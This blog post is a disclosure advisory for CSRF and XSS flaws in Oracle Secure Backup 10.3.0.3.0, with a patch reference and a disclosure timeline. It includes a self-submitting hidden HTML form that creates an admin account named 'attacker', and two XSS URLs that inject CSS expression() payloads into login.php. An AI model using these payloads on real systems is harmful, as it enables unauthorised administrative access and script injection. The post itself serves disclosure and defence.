Saturday, April 28, 2012

Oracle Secure Backup 10.3.0.3.0 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities

Description
Oracle Secure Backup is a general-purpose network data protection tool that simplifies and automates the backup and restore of files on a file system. The software can also serve as a media management layer for Recovery Manager through the SBT interface.

Sow Ching Shiong, an independent vulnerability researcher has discovered multiple vulnerabilities in Oracle Secure Backup. These issues were discovered in a default installation of Oracle Secure Backup 10.3.0.3.0. Other earlier versions may also be affected.


Proof of concept
Cross-Site Request Forgery (CSRF)
==========================

<html>
<body>
<form action="https://[target]/index.php" id="csrf" method="post">
<input type="hidden" name="process" value="1" />
<input type="hidden" name="tab" value="2" />
<input type="hidden" name="mode" value="2" />
<input type="hidden" name="button" value="Ok" />
<input type="hidden" name="screen" value="d" />
<input type="hidden" name="selector%5B%5D" value="" />
<input type="hidden" name="changeobject" value="attacker" />
<input type="hidden" name="upassword" value="passwd123" />
<input type="hidden" name="vpassword" value="passwd123" />
<input type="hidden" name="oclass" value="admin" />
<input type="hidden" name="uclass" value="" />
<input type="hidden" name="givenname" value="" />
<input type="hidden" name="unixname" value="" />
<input type="hidden" name="unixgroup" value="" />
<input type="hidden" name="ndmpserveruser" value="no" />
<input type="hidden" name="emailaddress" value="" />
<input type="hidden" name="op" value="Add" />
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>

Cross-Site Scripting (XSS)
====================

  • https://[target]/login.php?clear=yes&tab='%20stYle='x:expre/**/ssion(alert(1))%20&mode=3
  • https://[target]/login.php?clear=yes&tab=3&mode='%20stYle='x:expre/**/ssion(alert(1))


Solution
Oracle has released patches which address these issues. Please see the references for more information.

References

Vendor URL: http://www.oracle.com/technetwork/topics/security/cpujuly2011-313328.html
Secunia: http://secunia.com/advisories/43011/

Disclosure Timeline
2011-01-21 - Vulnerabilities discovered.
2011-01-21 - Vulnerabilities reported to Secunia.
2011-01-21 - Secunia confirmed the vulnerabilities and contacted the vendor.
2011-07-19 - 
Patch released.
2011-07-20 - 
Advisory published by Secunia.

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.